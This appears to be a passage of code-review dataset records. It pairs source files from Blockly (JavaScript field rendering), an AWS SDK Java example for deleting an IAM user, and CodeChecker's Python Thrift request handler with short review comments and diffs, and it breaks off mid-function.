Blockly.Field.fromJson uses this registry to find the appropriate field. * @param {!string} type The field type name as used in the JSON definition. * @param {!{fromJson: Function}} fieldClass The field class containing a * fromJson function that can construct an instance of the field. * @throws {Error} if the type name is empty, or the fieldClass is not an * object containing a fromJson function. */ Blockly.Field.register = function(type, fieldClass) { if (!goog.isString(type) || goog.string.isEmptyOrWhitespace(type)) { throw new Error('Invalid field type "' + type + '"'); } if (!goog.isObject(fieldClass) || !goog.isFunction(fieldClass.fromJson)) { throw new Error('Field "' + fieldClass + '" must have a fromJson function'); } Blockly.Field.TYPE_MAP_[type] = fieldClass; }; /** * Construct a Field from a JSON arg object. * Finds the appropriate registered field by the type name as registered using * Blockly.Field.register. * @param {!Object} options A JSON object with a type and options specific * to the field type. * @returns {?Blockly.Field} The new field instance or null if a field wasn't * found with the given type name * @package */ Blockly.Field.fromJson = function(options) { var fieldClass = Blockly.Field.TYPE_MAP_[options['type']]; if (fieldClass) { return fieldClass.fromJson(options); } return null; }; /** * Temporary cache of text widths. * @type {Object} * @private */ Blockly.Field.cacheWidths_ = null; /** * Number of current references to cache. * @type {number} * @private */ Blockly.Field.cacheReference_ = 0; /** * Name of field. Unique within each block. * Static labels are usually unnamed. * @type {string|undefined} */ Blockly.Field.prototype.name = undefined; /** * CSS class name for the text element. * @type {string} * @package */ Blockly.Field.prototype.className_ = 'blocklyText'; /** * Visible text to display. * @type {string} * @private */ Blockly.Field.prototype.text_ = ''; /** * Block this field is attached to. Starts as null, then in set in init. * @type {Blockly.Block} * @private */ Blockly.Field.prototype.sourceBlock_ = null; /** * Is the field visible, or hidden due to the block being collapsed? * @type {boolean} * @private */ Blockly.Field.prototype.visible_ = true; /** * Null, or an array of the field's argTypes (for styling). * @type {Array} * @private */ Blockly.Field.prototype.argType_ = null; /** * Validation function called when user edits an editable field. * @type {Function} * @private */ Blockly.Field.prototype.validator_ = null; /** * Non-breaking space. * @const */ Blockly.Field.NBSP = '\u00A0'; /** * Text offset used for IE/Edge. * @const */ Blockly.Field.IE_TEXT_OFFSET = '0.3em'; /** * Editable fields usually show some sort of UI for the user to change them. * @type {boolean} * @public */ Blockly.Field.prototype.EDITABLE = true; /** * Serializable fields are saved by the XML renderer, non-serializable fields * are not. Editable fields should be serialized. * @type {boolean} * @public */ Blockly.Field.prototype.SERIALIZABLE = true; /** * Attach this field to a block. * @param {!Blockly.Block} block The block containing this field. */ Blockly.Field.prototype.setSourceBlock = function(block) { goog.asserts.assert(!this.sourceBlock_, 'Field already bound to a block.'); this.sourceBlock_ = block; }; /** * Install this field on a block. */ Blockly.Field.prototype.init = function() { if (this.fieldGroup_) { // Field has already been initialized once. return; } // Build the DOM. this.fieldGroup_ = Blockly.utils.createSvgElement('g', {}, null); if (!this.visible_) { this.fieldGroup_.style.display = 'none'; } // Add an attribute to cassify the type of field. if (this.getArgTypes() !== null) { if (this.sourceBlock_.isShadow()) { this.sourceBlock_.svgGroup_.setAttribute('data-argument-type', this.getArgTypes()); } else { // Fields without a shadow wrapper, like square dropdowns. this.fieldGroup_.setAttribute('data-argument-type', this.getArgTypes()); } } // Adjust X to be flipped for RTL. Position is relative to horizontal start of source block. var size = this.getSize(); var fieldX = (this.sourceBlock_.RTL) ? -size.width / 2 : size.width / 2; /** @type {!Element} */ this.textElement_ = Blockly.utils.createSvgElement('text', { 'class': this.className_, 'x': fieldX, 'y': size.height / 2 + Blockly.BlockSvg.FIELD_TOP_PADDING, 'dominant-baseline': 'middle', 'dy': goog.userAgent.EDGE_OR_IE ? Blockly.Field.IE_TEXT_OFFSET : '0', 'text-anchor': 'middle' }, this.fieldGroup_); this.updateEditable(); this.sourceBlock_.getSvgRoot().appendChild(this.fieldGroup_); // Force a render. this.render_(); this.size_.width = 0; this.mouseDownWrapper_ = Blockly.bindEventWithChecks_( this.getClickTarget_(), 'mousedown', this, this.onMouseDown_); }; /** * Initializes the model of the field after it has been installed on a block. * No-op by default. */ Blockly.Field.prototype.initModel = function() { }; /** * Dispose of all DOM objects belonging to this editable field. */ Blockly.Field.prototype.dispose = function() { if (this.mouseDownWrapper_) { Blockly.unbindEvent_(this.mouseDownWrapper_); this.mouseDownWrapper_ = null; } this.sourceBlock_ = null; goog.dom.removeNode(this.fieldGroup_); this.fieldGroup_ = null; this.textElement_ = null; this.validator_ = null; }; /** * Add or remove the UI indicating if this field is editable or not. */ Blockly.Field.prototype.updateEditable = function() { var group = this.fieldGroup_; if (!this.EDITABLE || !group) { return; } if (this.sourceBlock_.isEditable()) { Blockly.utils.addClass(group, 'blocklyEditableText'); Blockly.utils.removeClass(group, 'blocklyNonEditableText'); this.fieldGroup_.style.cursor = this.CURSOR; } else { Blockly.utils.addClass(group, 'blocklyNonEditableText'); Blockly.utils.removeClass(group, 'blocklyEditableText'); this.fieldGroup_.style.cursor = ''; } }; /** * Check whether this field is currently editable. Some fields are never * editable (e.g. text labels). Those fields are not serialized to XML. Other * fields may be editable, and therefore serialized, but may exist on * non-editable blocks. * @return {boolean} whether this field is editable and on an editable block */ Blockly.Field.prototype.isCurrentlyEditable = function() { return this.EDITABLE && !!this.sourceBlock_ && this.sourceBlock_.isEditable(); }; /** * Gets whether this editable field is visible or not. * @return {boolean} True if visible. */ Blockly.Field.prototype.isVisible = function() { return this.visible_; }; /** * Sets whether this editable field is visible or not. * @param {boolean} visible True if visible. */ Blockly.Field.prototype.setVisible = function(visible) { if (this.visible_ == visible) { return; } this.visible_ = visible; var root = this.getSvgRoot(); if (root) { root.style.display = visible ? 'block' : 'none'; this.render_(); } }; /** * Adds a string to the field's array of argTypes (used for styling). * @param {string} argType New argType. */ Blockly.Field.prototype.addArgType = function(argType) { if (this.argType_ == null) { this.argType_ = []; } this.argType_.push(argType); }; /** * Gets the field's argTypes joined as a string, or returns null (used for styling). * @return {string} argType string, or null. */ Blockly.Field.prototype.getArgTypes = function() { if (this.argType_ === null || this.argType_.length === 0) { return null; } else { return this.argType_.join(' '); } }; /** * Sets a new validation function for editable fields. * @param {Function} handler New validation function, or null. */ Blockly.Field.prototype.setValidator = function(handler) { this.validator_ = handler; }; /** * Gets the validation function for editable fields. * @return {Function} Validation function, or null. */ Blockly.Field.prototype.getValidator = function() { return this.validator_; }; /** * Validates a change. Does nothing. Subclasses may override this. * @param {string} text The user's text. * @return {string} No change needed. */ Blockly.Field.prototype.classValidator = function(text) { return text; }; /** * Calls the validation function for this field, as well as all the validation * function for the field's class and its parents. * @param {string} text Proposed text. * @return {?string} Revised text, or null if invalid. */ Blockly.Field.prototype.callValidator = function(text) { var classResult = this.classValidator(text); if (classResult === null) { // Class validator rejects value. Game over. return null; } else if (classResult !== undefined) { text = classResult; } var userValidator = this.getValidator(); if (userValidator) { var userResult = userValidator.call(this, text); if (userResult === null) { // User validator rejects value. Game over. return null; } else if (userResult !== undefined) { text = userResult; } } return text; }; /** * Gets the group element for this editable field. * Used for measuring the size and for positioning. * @return {!Element} The group element. */ Blockly.Field.prototype.getSvgRoot = function() { return /** @type {!Element} */ (this.fieldGroup_); }; /** * Draws the border with the correct width. * Saves the computed width in a property. * @private */ Blockly.Field.prototype.render_ = function() { if (this.visible_ && this.textElement_) { // Replace the text. this.textElement_.textContent = this.getDisplayText_(); this.updateWidth(); // Update text centering, based on newly calculated width. var centerTextX = (this.size_.width - this.arrowWidth_) / 2; if (this.sourceBlock_.RTL) { centerTextX += this.arrowWidth_; } // In a text-editing shadow block's field, // if half the text length is not at least center of // visible field (FIELD_WIDTH), center it there instead, // unless there is a drop-down arrow. if (this.sourceBlock_.isShadow() && !this.positionArrow) { var minOffset = Blockly.BlockSvg.FIELD_WIDTH / 2; if (this.sourceBlock_.RTL) { // X position starts at the left edge of the block, in both RTL and LTR. // First offset by the width of the block to move to the right edge, // and then subtract to move to the same position as LTR. var minCenter = this.size_.width - minOffset; centerTextX = Math.min(minCenter, centerTextX); } else { // (width / 2) should exceed Blockly.BlockSvg.FIELD_WIDTH / 2 // if the text is longer. centerTextX = Math.max(minOffset, centerTextX); } } // Apply new text element x position. this.textElement_.setAttribute('x', centerTextX); } // Update any drawn box to the correct width and height. if (this.box_) { this.box_.setAttribute('width', this.size_.width); this.box_.setAttribute('height', this.size_.height); } }; /** * Updates the width of the field. This calls getCachedWidth which won't cache * the approximated width on IE/Edge when `getComputedTextLength` fails. Once * it eventually does succeed, the result will be cached. **/ Blockly.Field.prototype.updateWidth = function() { // Calculate width of field var width = Blockly.Field.getCachedWidth(this.textElement_); // Add padding to left and right of text. if (this.EDITABLE) { width += Blockly.BlockSvg.EDITABLE_FIELD_PADDING; } // Adjust width for drop-down arrows. this.arrowWidth_ = 0; if (this.positionArrow) { this.arrowWidth_ = this.positionArrow(width); width += this.arrowWidth_; } // Add padding to any drawn box. if (this.box_) { width += 2 * Blockly.BlockSvg.BOX_FIELD_PADDING; } // Set width of the field. this.size_.width = width; }; /** * Gets the width of a text element, caching it in the process. * @param {!Element} textElement An SVG 'text' element. * @return {number} Width of element. */ Blockly.Field.getCachedWidth = function(textElement) { var key = textElement.textContent + '\n' + textElement.className.baseVal; var width; // Return the cached width if it exists. if (Blockly.Field.cacheWidths_) { width = Blockly.Field.cacheWidths_[key]; if (width) { return width; } } // Attempt to compute fetch the width of the SVG text element. try { if (goog.userAgent.IE || goog.userAgent.EDGE) { width = textElement.getBBox().width; } else { width = textElement.getComputedTextLength(); } } catch (e) { // In other cases where we fail to geth the computed text. Instead, use an // approximation and do not cache the result. At some later point in time // when the block is inserted into the visible DOM, this method will be // called again and, at that point in time, will not throw an exception. return textElement.textContent.length * 8; } // Cache the computed width and return. if (Blockly.Field.cacheWidths_) { Blockly.Field.cacheWidths_[key] = width; } return width; }; /** * Start caching field widths. Every call to this function MUST also call * stopCache. Caches must not survive between execution threads. */ Blockly.Field.startCache = function() { Blockly.Field.cacheReference_++; if (!Blockly.Field.cacheWidths_) { Blockly.Field.cacheWidths_ = {}; } }; /** * Stop caching field widths. Unless caching was already on when the * corresponding call to startCache was made. */ Blockly.Field.stopCache = function() { Blockly.Field.cacheReference_--; if (!Blockly.Field.cacheReference_) { Blockly.Field.cacheWidths_ = null; } }; /** * Returns the height and width of the field. * @return {!goog.math.Size} Height and width. */ Blockly.Field.prototype.getSize = function() { if (!this.size_.width) { this.render_(); } return this.size_; }; /** * Returns the bounding box of the rendered field, accounting for workspace * scaling. * @return {!Object} An object with top, bottom, left, and right in pixels * relative to the top left corner of the page (window coordinates). * @private */ Blockly.Field.prototype.getScaledBBox_ = function() { var size = this.getSize(); var scaledHeight = size.height * this.sourceBlock_.workspace.scale; var scaledWidth = size.width * this.sourceBlock_.workspace.scale; var xy = this.getAbsoluteXY_(); return { top: xy.y, bottom: xy.y + scaledHeight, left: xy.x, right: xy.x + scaledWidth }; }; /** * Get the text from this field as displayed on screen. May differ from getText * due to ellipsis, and other formatting. * @return {string} Currently displayed text. * @private */ Blockly.Field.prototype.getDisplayText_ = function() { var text = this.text_; if (!text) { // Prevent the field from disappearing if empty. return Blockly.Field.NBSP; } if (text.length > this.maxDisplayLength) { // Truncate displayed string and add an ellipsis ('...'). text = text.substring(0, this.maxDisplayLength - 2) + '\u2026'; } // Replace whitespace with non-breaking spaces so the text doesn't collapse. text = text.replace(/\s/g, Blockly.Field.NBSP); if (this.sourceBlock_.RTL) { // The SVG is LTR, force text to be RTL. text += '\u200F'; } return text; }; /** * Get the text from this field. * @return {string} Current text. */ Blockly.Field.prototype.getText = function() { return this.text_; }; /** * Set the text in this field. Trigger a rerender of the source block. * @param {*} newText New text. */ Blockly.Field.prototype.setText = function(newText) { if (newText === null) { // No change if null. return; } newText = String(newText); if (newText === this.text_) { // No change. return; } this.text_ = newText; this.forceRerender(); }; /** * Force a rerender of the block that this field is installed on, which will * rerender this field and adjust for any sizing changes. * Other fields on the same block will not rerender, because their sizes have * already been recorded. * @package */ Blockly.Field.prototype.forceRerender = function() { // Set width to 0 to force a rerender of this field. this.size_.width = 0; if (this.sourceBlock_ && this.sourceBlock_.rendered) { this.sourceBlock_.render(); this.sourceBlock_.bumpNeighbours_(); } }; /** * Update the text node of this field to display the current text. * @private */ Blockly.Field.prototype.updateTextNode_ = function() { if (!this.textElement_) { // Not rendered yet. return; } var text = this.text_; if (text.length > this.maxDisplayLength) { // Truncate displayed string and add an ellipsis ('...'). text = text.substring(0, this.maxDisplayLength - 2) + '\u2026'; // Add special class for sizing font when truncated this.textElement_.setAttribute('class', this.className_ + ' blocklyTextTruncated'); } else { this.textElement_.setAttribute('class', this.className_); } // Empty the text element. goog.dom.removeChildren(/** @type {!Element} */ (this.textElement_)); // Replace whitespace with non-breaking spaces so the text doesn't collapse. text = text.replace(/\s/g, Blockly.Field.NBSP); if (this.sourceBlock_.RTL && text) { // The SVG is LTR, force text to be RTL. text += '\u200F'; } if (!text) { // Prevent the field from disappearing if empty. text = Blockly.Field.NBSP; } var textNode = document.createTextNode(text); this.textElement_.appendChild(textNode); // Cached width is obsolete. Clear it. this.size_.width = 0; }; /** * By default there is no difference between the human-readable text and * the language-neutral values. Subclasses (such as dropdown) may define this. * @return {string} Current value. */ Blockly.Field.prototype.getValue = function() { return this.getText(); }; /** * By default there is no difference between the human-readable text and * the language-neutral values. Subclasses (such as dropdown) may define this. * @param {string} newValue New value. */ Blockly.Field.prototype.setValue = function(newValue) { if (newValue === null) { // No change if null. return; } var oldValue = this.getValue(); if (oldValue == newValue) { return; } if (this.sourceBlock_ && Blockly.Events.isEnabled()) { Blockly.Events.fire(new Blockly.Events.BlockChange( this.sourceBlock_, 'field', this.name, oldValue, newValue)); } this.setText(newValue); }; /** * Handle a mouse down event on a field. * @param {!Event} e Mouse down event. * @private */ Blockly.Field.prototype.onMouseDown_ = function(e) { if (!this.sourceBlock_ || !this.sourceBlock_.workspace) { return; } var gesture = this.sourceBlock_.workspace.getGesture(e); if (gesture) { gesture.setStartField(this); } }; /** * Change the tooltip text for this field. * @param {string|!Element} _newTip Text for tooltip or a parent element to * link to for its tooltip. * @abstract */ Blockly.Field.prototype.setTooltip = function(_newTip) { // Non-abstract sub-classes may wish to implement this. See FieldLabel. }; /** * Select the element to bind the click handler to. When this element is * clicked on an editable field, the editor will open. * * If the block has only one field and no output connection, we handle clicks * over the whole block. Otherwise, handle clicks over the the group containing * the field. * * @return {!Element} Element to bind click handler to. * @private */ Blockly.Field.prototype.getClickTarget_ = function() { var nFields = 0; for (var i = 0, input; input = this.sourceBlock_.inputList[i]; i++) { nFields += input.fieldRow.length; } if (nFields <= 1 && this.sourceBlock_.outputConnection) { return this.sourceBlock_.getSvgRoot(); } else { return this.getSvgRoot(); } }; /** * Return the absolute coordinates of the top-left corner of this field. * The origin (0,0) is the top-left corner of the page body. * @return {!goog.math.Coordinate} Object with .x and .y properties. * @private */ Blockly.Field.prototype.getAbsoluteXY_ = function() { return goog.style.getPageOffset(this.getClickTarget_()); }; /** * Whether this field references any Blockly variables. If true it may need to * be handled differently during serialization and deserialization. Subclasses * may override this. * @return {boolean} True if this field has any variable references. * @package */ Blockly.Field.prototype.referencesVariables = function() { return false; };
1
9,743
Can have negative numbers with the '-' on the right (`10-`) by just using line 610.
LLK-scratch-blocks
js
@@ -1,4 +1,4 @@ -//snippet-sourcedescription:[DeleteUser.java demonstrates how to delete an AWS Identity and Access Management (IAM) user. This is only possible for users with no associated resources.] +//snippet-sourcedescription:[DeleteUser.java demonstrates how to delete an AWS Identity and Access Management (AWS IAM) user. This is only possible for users with no associated resources.] //snippet-keyword:[AWS SDK for Java v2] //snippet-keyword:[Code Sample] //snippet-service:[AWS IAM]
1
//snippet-sourcedescription:[DeleteUser.java demonstrates how to delete an AWS Identity and Access Management (IAM) user. This is only possible for users with no associated resources.] //snippet-keyword:[AWS SDK for Java v2] //snippet-keyword:[Code Sample] //snippet-service:[AWS IAM] //snippet-sourcetype:[full-example] //snippet-sourcedate:[11/02/2020] //snippet-sourceauthor:[scmacdon-aws] /* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. SPDX-License-Identifier: Apache-2.0 */ package com.example.iam; // snippet-start:[iam.java2.delete_user.import] import software.amazon.awssdk.regions.Region; import software.amazon.awssdk.services.iam.IamClient; import software.amazon.awssdk.services.iam.model.DeleteUserRequest; import software.amazon.awssdk.services.iam.model.IamException; // snippet-end:[iam.java2.delete_user.import] public class DeleteUser { public static void main(String[] args) { final String USAGE = "\n" + "Usage:\n" + " DeleteUser <userName> \n\n" + "Where:\n" + " userName - the name of the user to delete. \n\n" ; if (args.length != 1) { System.out.println(USAGE); System.exit(1); } // Read the command line argument String userName = args[0]; Region region = Region.AWS_GLOBAL; IamClient iam = IamClient.builder() .region(region) .build(); deleteIAMUser(iam, userName); System.out.println("Done"); iam.close(); } // snippet-start:[iam.java2.delete_user.main] public static void deleteIAMUser(IamClient iam, String userName) { try { DeleteUserRequest request = DeleteUserRequest.builder() .userName(userName) .build(); iam.deleteUser(request); System.out.println("Successfully deleted IAM user " + userName); } catch (IamException e) { System.err.println(e.awsErrorDetails().errorMessage()); System.exit(1); } } // snippet-end:[iam.java2.delete_user.main] }
1
18,239
AWS Identity and Access Management (IAM)
awsdocs-aws-doc-sdk-examples
rb
@@ -2381,11 +2381,10 @@ class ThriftRequestHandler(object): check_commands, check_durations, cc_version, statistics = \ store_handler.metadata_info(metadata_file) - if len(check_commands) == 0: - command = ' '.join(sys.argv) - elif len(check_commands) == 1: + command = '' + if len(check_commands) == 1: command = ' '.join(check_commands[0]) - else: + elif len(check_commands) > 1: command = "multiple analyze calls: " + \ '; '.join([' '.join(com) for com in check_commands])
1
# ------------------------------------------------------------------------- # The CodeChecker Infrastructure # This file is distributed under the University of Illinois Open Source # License. See LICENSE.TXT for details. # ------------------------------------------------------------------------- """ Handle Thrift requests. """ from __future__ import print_function from __future__ import division from __future__ import absolute_import import base64 import codecs from collections import defaultdict from datetime import datetime, timedelta import io import json import os import sys import tempfile import zipfile import zlib import sqlalchemy from sqlalchemy.sql.expression import or_, and_, not_, func, \ asc, desc, text, union_all, select, bindparam, literal_column import shared from codeCheckerDBAccess_v6 import constants, ttypes from codeCheckerDBAccess_v6.ttypes import * from libcodechecker import generic_package_context from libcodechecker.source_code_comment_handler import \ SourceCodeCommentHandler, SKIP_REVIEW_STATUSES from libcodechecker import util # TODO: Cross-subpackage import here. from libcodechecker.analyze import plist_parser from libcodechecker.analyze import skiplist_handler from libcodechecker.logger import get_logger from libcodechecker.profiler import timeit from libcodechecker.report import get_report_path_hash from libcodechecker.server import permissions from libcodechecker.server.database import db_cleanup from libcodechecker.server.database.config_db_model import Product from libcodechecker.server.database.database import conv from libcodechecker.server.database.run_db_model import \ AnalyzerStatistic, Report, ReviewStatus, File, Run, RunHistory, \ RunLock, Comment, BugPathEvent, BugReportPoint, \ FileContent, SourceComponent from libcodechecker.util import DBSession, slugify from . import store_handler LOG = get_logger('server') def exc_to_thrift_reqfail(func): """ Convert internal exceptions to RequestFailed exception which can be sent back on the thrift connections. """ func_name = func.__name__ def wrapper(*args, **kwargs): try: res = func(*args, **kwargs) return res except sqlalchemy.exc.SQLAlchemyError as alchemy_ex: # Convert SQLAlchemy exceptions. msg = str(alchemy_ex) LOG.warning("%s:\n%s", func_name, msg) raise shared.ttypes.RequestFailed(shared.ttypes.ErrorCode.DATABASE, msg) except shared.ttypes.RequestFailed as rf: LOG.warning(rf.message) raise except Exception as ex: LOG.warning(ex.message) raise shared.ttypes.RequestFailed(shared.ttypes.ErrorCode.GENERAL, ex.message) return wrapper def get_component_values(session, component_name): """ Get component values by component names and returns a tuple where the first item contains a list path which should be skipped and the second item contains a list of path which should be included. E.g.: +/a/b/x.cpp +/a/b/y.cpp -/a/b On the above component value this function will return the following: (['/a/b'], ['/a/b/x.cpp', '/a/b/y.cpp']) """ components = session.query(SourceComponent) \ .filter(SourceComponent.name.like(component_name)) \ .all() skip = [] include = [] for component in components: values = component.value.split('\n') for value in values: v = value[1:].strip() if value[0] == '+': include.append(v) elif value[0] == '-': skip.append(v) return skip, include def process_report_filter(session, report_filter): """ Process the new report filter. """ if report_filter is None: return text('') AND = [] if report_filter.filepath is not None: OR = [File.filepath.ilike(conv(fp)) for fp in report_filter.filepath] AND.append(or_(*OR)) if report_filter.checkerMsg is not None: OR = [Report.checker_message.ilike(conv(cm)) for cm in report_filter.checkerMsg] AND.append(or_(*OR)) if report_filter.checkerName is not None: OR = [Report.checker_id.ilike(conv(cn)) for cn in report_filter.checkerName] AND.append(or_(*OR)) if report_filter.runName is not None: OR = [Run.name.ilike(conv(rn)) for rn in report_filter.runName] AND.append(or_(*OR)) if report_filter.reportHash is not None: OR = [Report.bug_id.ilike(conv(rh)) for rh in report_filter.reportHash] AND.append(or_(*OR)) if report_filter.severity is not None: AND.append(Report.severity.in_(report_filter.severity)) if report_filter.detectionStatus is not None: dst = list(map(detection_status_str, report_filter.detectionStatus)) AND.append(Report.detection_status.in_(dst)) if report_filter.reviewStatus is not None: OR = [ReviewStatus.status.in_( list(map(review_status_str, report_filter.reviewStatus)))] # No database entry for unreviewed reports if (ttypes.ReviewStatus.UNREVIEWED in report_filter.reviewStatus): OR.append(ReviewStatus.status.is_(None)) AND.append(or_(*OR)) detection_status = report_filter.detectionStatus if report_filter.firstDetectionDate is not None: date = datetime.fromtimestamp(report_filter.firstDetectionDate) OR = [] if detection_status is not None and len(detection_status) == 1 and \ ttypes.DetectionStatus.RESOLVED in detection_status: OR.append(Report.fixed_at >= date) else: OR.append(Report.detected_at >= date) AND.append(or_(*OR)) if report_filter.fixDate is not None: date = datetime.fromtimestamp(report_filter.fixDate) OR = [] if detection_status is not None and len(detection_status) == 1 and \ ttypes.DetectionStatus.RESOLVED in detection_status: OR.append(Report.fixed_at < date) else: OR.append(Report.detected_at < date) AND.append(or_(*OR)) if report_filter.runHistoryTag is not None: OR = [] for history_date in report_filter.runHistoryTag: date = datetime.strptime(history_date, '%Y-%m-%d %H:%M:%S.%f') OR.append(and_(Report.detected_at <= date, or_( Report.fixed_at.is_(None), Report.fixed_at >= date))) AND.append(or_(*OR)) if report_filter.runTag is not None: OR = [] for tag_id in report_filter.runTag: history = session.query(RunHistory).get(tag_id) OR.append(and_(Report.run_id == history.run_id, and_(Report.detected_at <= history.time, or_(Report.fixed_at.is_(None), Report.fixed_at >= history.time)))) AND.append(or_(*OR)) if report_filter.componentNames is not None: OR = [] for component_name in report_filter.componentNames: skip, include = get_component_values(session, component_name) skip_q, include_q = None, None if include: and_q = [File.filepath.like(conv(fp)) for fp in include] include_q = select([File.id]).where(or_(*and_q)) if skip: and_q = [(File.filepath.like(conv(fp))) for fp in skip] skip_q = select([File.id]).where(or_(*and_q)) file_ids = [] if skip and include: skip_q = include_q.except_(skip_q).alias('component') file_ids = session.query(skip_q) \ .distinct() \ .all() elif include: file_ids = session.query(include_q.alias('include')).all() elif skip: and_q = [not_(File.filepath.like(conv(fp))) for fp in skip] skip_q = select([File.id]).where(and_(*and_q)) file_ids = session.query(skip_q.alias('skip')).all() OR.append(or_(File.id.in_([f_id[0] for f_id in file_ids]))) AND.append(or_(*OR)) filter_expr = and_(*AND) return filter_expr def get_diff_hashes_for_query(base_run_ids, base_line_hashes, new_run_ids, new_check_hashes, diff_type): """ Get the report hash list for the result comparison. Returns the list of hashes (NEW, RESOLVED, UNRESOLVED) and the run ids which should be queried for the reports. """ if diff_type == DiffType.NEW: df = [] + list(new_check_hashes.difference(base_line_hashes)) return df, new_run_ids elif diff_type == DiffType.RESOLVED: df = [] + list(base_line_hashes.difference(new_check_hashes)) return df, base_run_ids elif diff_type == DiffType.UNRESOLVED: df = [] + list(base_line_hashes.intersection(new_check_hashes)) return df, new_run_ids else: msg = 'Unsupported diff type: ' + str(diff_type) LOG.error(msg) raise shared.ttypes.RequestFailed(shared.ttypes.ErrorCode.DATABASE, msg) def bugpathevent_db_to_api(bpe): return ttypes.BugPathEvent( startLine=bpe.line_begin, startCol=bpe.col_begin, endLine=bpe.line_end, endCol=bpe.col_end, msg=bpe.msg, fileId=bpe.file_id) def bugreportpoint_db_to_api(brp): return BugPathPos( startLine=brp.line_begin, startCol=brp.col_begin, endLine=brp.line_end, endCol=brp.col_end, fileId=brp.file_id) def detection_status_enum(status): if status == 'new': return DetectionStatus.NEW elif status == 'resolved': return DetectionStatus.RESOLVED elif status == 'unresolved': return DetectionStatus.UNRESOLVED elif status == 'reopened': return DetectionStatus.REOPENED def detection_status_str(status): if status == DetectionStatus.NEW: return 'new' elif status == DetectionStatus.RESOLVED: return 'resolved' elif status == DetectionStatus.UNRESOLVED: return 'unresolved' elif status == DetectionStatus.REOPENED: return 'reopened' def review_status_str(status): if status == ttypes.ReviewStatus.UNREVIEWED: return 'unreviewed' elif status == ttypes.ReviewStatus.CONFIRMED: return 'confirmed' elif status == ttypes.ReviewStatus.FALSE_POSITIVE: return 'false_positive' elif status == ttypes.ReviewStatus.INTENTIONAL: return 'intentional' def review_status_enum(status): if status == 'unreviewed': return ttypes.ReviewStatus.UNREVIEWED elif status == 'confirmed': return ttypes.ReviewStatus.CONFIRMED elif status == 'false_positive': return ttypes.ReviewStatus.FALSE_POSITIVE elif status == 'intentional': return ttypes.ReviewStatus.INTENTIONAL def unzip(b64zip, output_dir): """ This function unzips the base64 encoded zip file. This zip is extracted to a temporary directory and the ZIP is then deleted. The function returns the name of the extracted directory. """ with tempfile.NamedTemporaryFile(suffix='.zip') as zip_file: LOG.debug("Unzipping mass storage ZIP '{0}' to '{1}'..." .format(zip_file.name, output_dir)) zip_file.write(zlib.decompress(base64.b64decode(b64zip))) with zipfile.ZipFile(zip_file, 'r', allowZip64=True) as zipf: try: zipf.extractall(output_dir) except Exception: LOG.error("Failed to extract received ZIP.") import traceback traceback.print_exc() raise def create_review_data(review_status): if review_status: return ReviewData(status=review_status_enum(review_status.status), comment=review_status.message, author=review_status.author, date=str(review_status.date)) else: return ReviewData(status=ttypes.ReviewStatus.UNREVIEWED) def create_count_expression(report_filter): if report_filter is not None and report_filter.isUnique: return func.count(Report.bug_id.distinct()) else: return func.count(literal_column('*')) def filter_report_filter(q, filter_expression, run_ids=None, cmp_data=None, diff_hashes=None): if run_ids: q = q.filter(Report.run_id.in_(run_ids)) q = q.outerjoin(File, Report.file_id == File.id) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) \ .filter(filter_expression) if cmp_data: q = q.filter(Report.bug_id.in_(diff_hashes)) return q def get_sort_map(sort_types, is_unique=False): # Get a list of sort_types which will be a nested ORDER BY. sort_type_map = { SortType.FILENAME: [(File.filepath, 'filepath'), (Report.line, 'line')], SortType.BUG_PATH_LENGTH: [(Report.path_length, 'bug_path_length')], SortType.CHECKER_NAME: [(Report.checker_id, 'checker_id')], SortType.SEVERITY: [(Report.severity, 'severity')], SortType.REVIEW_STATUS: [(ReviewStatus.status, 'rw_status')], SortType.DETECTION_STATUS: [(Report.detection_status, 'dt_status')]} if is_unique: sort_type_map[SortType.FILENAME] = [(File.filename, 'filename')] sort_type_map[SortType.DETECTION_STATUS] = [] # Mapping the SQLAlchemy functions. order_type_map = {Order.ASC: asc, Order.DESC: desc} if sort_types is None: sort_types = [SortMode(SortType.SEVERITY, Order.DESC)] return sort_types, sort_type_map, order_type_map def sort_results_query(query, sort_types, sort_type_map, order_type_map, order_by_label=False): """ Helper method for __queryDiffResults and queryResults to apply sorting. """ for sort in sort_types: sorttypes = sort_type_map.get(sort.type) for sorttype in sorttypes: order_type = order_type_map.get(sort.ord) sort_col = sorttype[1] if order_by_label else sorttype[0] query = query.order_by(order_type(sort_col)) return query def filter_unresolved_reports(q): """ Filter reports which are unresolved. Note: review status of these reports are not in the SKIP_REVIEW_STATUSES list. """ skip_review_status = SKIP_REVIEW_STATUSES return q.filter(Report.fixed_at.is_(None)) \ .filter(or_(ReviewStatus.status.is_(None), ReviewStatus.status.notin_(skip_review_status))) \ .outerjoin(ReviewStatus, ReviewStatus.bug_hash == Report.bug_id) def get_report_hashes(session, run_ids, tag_ids): """ Get report hash list for the reports which can be found in the given runs and the given tags. """ q = session.query(Report.bug_id) if run_ids: q = q.filter(Report.run_id.in_(run_ids)) if tag_ids: q = q.outerjoin(RunHistory, RunHistory.run_id == Report.run_id) \ .filter(RunHistory.id.in_(tag_ids)) \ .filter(Report.detected_at <= RunHistory.time) \ .filter(or_(Report.fixed_at.is_(None), Report.fixed_at > RunHistory.time)) return set([t[0] for t in q]) def check_remove_runs_lock(session, run_ids): """ Check if there is an existing lock on the given runs, which has not expired yet. If so, the run cannot be deleted, as someone is assumed to be storing into it. """ locks_expired_at = datetime.now() - timedelta( seconds=db_cleanup.RUN_LOCK_TIMEOUT_IN_DATABASE) run_locks = session.query(RunLock.name) \ .filter(RunLock.locked_at >= locks_expired_at) if run_ids: run_locks = run_locks.filter(Run.id.in_(run_ids)) run_locks = run_locks \ .outerjoin(Run, Run.name == RunLock.name) \ .all() if run_locks: raise shared.ttypes.RequestFailed( shared.ttypes.ErrorCode.DATABASE, "Can not remove results because the following runs " "are locked: {0}".format( ', '.join([r[0] for r in run_locks]))) class ThriftRequestHandler(object): """ Connect to database and handle thrift client requests. """ def __init__(self, manager, Session, product, auth_session, config_database, checker_md_docs, checker_md_docs_map, src_comment_handler, package_version): if not product: raise ValueError("Cannot initialize request handler without " "a product to serve.") self.__manager = manager self.__product = product self.__auth_session = auth_session self.__config_database = config_database self.__checker_md_docs = checker_md_docs self.__checker_doc_map = checker_md_docs_map self.__src_comment_handler = src_comment_handler self.__package_version = package_version self.__Session = Session self.__permission_args = { 'productID': product.id } def __require_permission(self, required): """ Helper method to raise an UNAUTHORIZED exception if the user does not have any of the given permissions. """ with DBSession(self.__config_database) as session: args = dict(self.__permission_args) args['config_db_session'] = session if not any([permissions.require_permission( perm, args, 